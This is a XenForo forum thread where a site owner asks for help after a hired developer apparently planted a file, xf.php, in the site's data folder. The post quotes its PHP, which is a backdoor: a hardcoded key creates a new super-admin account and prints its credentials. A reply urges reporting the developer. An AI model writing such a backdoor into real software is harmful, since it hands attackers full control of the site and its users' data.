XF 2.2 xenforo developer may have added an exploit file

MR X

MR X

Member
so i hired a dev on fiverr to make me an addon, it took way to long to complete by the time frame so i fired him, then some time later re-hired him to actually finish it, garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php, this is not an official xenforo file is it? because within it is.

PHP: 
if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

that is just the jist of what all was in it.

appreciate some support thank you.
 
Sort by date Sort by votes
MR X said:
he basically added a backdoor like i said, but he also added advertisement code so he can profit on my website, (ad code within the addon he was fixing up. (i would say the bad actors devs name, but i dont know if i can expose it on XF)
Click to expand...
I've seen call outs of bad devs here on xenforo. If he's using the site here to then do fraudulent or black hat work, we need to know who it is and you would be doing the community a great service. At the very least you should consider reporting this nabob to the admin here.
 
Upvote 0 Downvote
You must log in or register to reply here.
Back
Top Bottom